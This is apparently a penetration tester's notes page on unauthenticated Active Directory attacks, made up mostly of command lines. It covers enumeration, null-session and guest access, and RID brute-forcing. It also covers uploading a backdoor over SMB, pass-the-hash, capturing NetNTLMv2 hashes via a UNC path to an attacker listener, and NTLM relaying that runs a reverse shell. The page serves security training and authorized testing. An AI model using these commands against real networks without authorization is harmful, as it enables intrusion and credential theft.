# Without Credentials

### Host Discovery

```
nmap -sn 192.168.2.0/24
```

```
fping -a -g 192.168.2.0/24 2>/dev/null
```

### Scan the network

{% hint style="info" %}
If we find a vulnerable host we can easily get access to a machine; see [classic attacks](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/classic-attacks.md "mention")
{% endhint %}

```
# Enumerate SMB hosts (prints hostname, domain, OS and whether SMB signing is required)
cme smb IP/CIDR

# Search for SMB vulns (quote the glob so the shell does not expand it against local files)
nmap -Pn --script 'smb-vuln*' -p 139,445 IP
```

### Zone transfer

```
# Find the authoritative name servers first, then request a transfer from each
dig ns <domain>
dig axfr <domain> @<nameserver>
```

### List guest access on smb share

{% tabs %}
{% tab title="smbmap" %}
**Enumerate null session**

```
smbmap -u "" -p "" -H <dc-ip>
smbmap -u "guest" -p "" -H <dc-ip>
```

**To list all shares** (the following commands need a valid user; with a null or guest session use `-u "" -p ""` or `-u "guest" -p ""` as above)

```
smbmap -H <ip> -u <user> -p <pass> -L
```

**To list contents of C$**

```
smbmap -H <ip> -u <user> -p <pass> -r 'C$'
```

**To upload files**

```
smbmap -H <ip> -u <user> -p <pass> --upload '/root/backdoor' 'C$\backdoor'
```

**To download files**

```
smbmap -H <ip> -u <user> -p <pass> --download 'C$\flag.txt'
```

**To execute commands** (requires admin rights on the target)

```
smbmap -H <ip> -u <user> -p <pass> -x 'ipconfig'
```

{% endtab %}

{% tab title="smbclient" %}
**Enumerate null session**

```
smbclient -L <ip> -N
smbclient //<ip>/public -N
```

**Enumerate with credentials**

```
smbclient -L <ip> -U <user>
smbclient //<ip>/public -U <user>
# Pass-the-hash: authenticate with the NT hash instead of the password
smbclient //192.168.50.212/secrets -U <user> --pw-nt-hash <hash>
```

{% endtab %}

{% tab title="enum4linux" %}
**Enumerate null session**

```
enum4linux -a -u "" -p "" <dc-ip>
enum4linux -a -u "guest" -p "" <dc-ip>
```

{% endtab %}

{% tab title="crackmapexec" %}

#### Enumerate null session

```
cme smb <ip> -u "" -p "" --shares
```

#### Enumerate guest access

Any non-existent username with an empty password is mapped to the guest account when guest access is enabled:

```
cme smb <ip> -u "a" -p "" --shares
```

{% endtab %}
{% endtabs %}

### Enumerate ldap

```
# Anonymous bind: read the naming contexts (gives the base DN of the domain)
ldapsearch -x -H ldap://<ip> -s base namingcontexts

# Then dump what the anonymous bind is allowed to see under that base
ldapsearch -x -H ldap://<ip> -b "DC=<domain>,DC=<tld>"
```

### Find User List

{% tabs %}
{% tab title="crackmapexec" %}

```
cme smb <ip> -u "" -p "" --users
# Keep only the username column of the SMB result lines
cme smb <ip> -u "" -p "" --users | grep -E '^\s*SMB\s' | awk '{print $5}'
```

RID brute-forcing via the null/guest session when `--users` is denied:

```
crackmapexec smb <ip> -u "" -p "" --rid-brute > valid_ad
crackmapexec smb <ip> -u "guest" -p "" --rid-brute | grep -oP '(?<=: ).*(?= \(SidTypeUser\))' | awk -F'\\\\' '{print $2}' > valid_ad
```

{% endtab %}

{% tab title="enum4linux" %}

```
enum4linux -U <dc-ip> | grep "user"
```

{% endtab %}

{% tab title="net" %}

```
net rpc group members "Domain Users" -W "<domain>" -I "<ip>" -U "%"
```

{% endtab %}

{% tab title="rpcclient" %}
{% code overflow="wrap" %}

```
rpcclient -U "" -N IP
rpcclient > enumdomusers

rpcclient -U "" -N -c "enumdomusers" 10.10.10.172 | grep "^user:" | awk '{print $1}' | cut -d: -f2 | sed 's/\[\|\]//g'
```

{% endcode %}
{% endtab %}

{% tab title="windapsearch" %}

```
python windapsearch.py -u "" --dc-ip 10.10.10.172 -U --admin-objects
python windapsearch.py -u "" --dc-ip 10.10.10.172 -U -m "<group>"
```

{% endtab %}
{% endtabs %}

## Grab NTLMv2 hash

<https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/>

### File Upload

When we discover a file upload form in a web application on a Windows server, we can try to enter a non-existent file with a UNC path like `\\192.168.119.2\share\nonexistent.txt`. If the web application resolves the UNC path, the Windows server authenticates to our SMB listener (Responder or `impacket-smbserver` on 192.168.119.2), which records the NetNTLMv2 response for offline cracking.

![](https://github.com/marcgoam/M4RCG04M-blog/blob/main/notes/active-directory/imgs/Pasted%20image%2020250721124311.png)

## Relaying NTLMv2

### SMB Relaying

Relaying only works against hosts where SMB signing is not required; build the target list first and make sure Responder's own SMB and HTTP servers are disabled so ntlmrelayx receives the connection. The `-c` command runs on the target as the relayed user; a base64-encoded PowerShell one-liner works as a reverse shell.

```
# Hosts with SMB signing not required, one per line
cme smb <ip/cidr> --gen-relay-list targets.txt

# Relay incoming authentication to them and run a command
impacket-ntlmrelayx --no-http-server -smb2support -tf targets.txt -c <reverse_shell>

# Single target
impacket-ntlmrelayx --no-http-server -smb2support -t <target_ip> -c <reverse_shell>
```
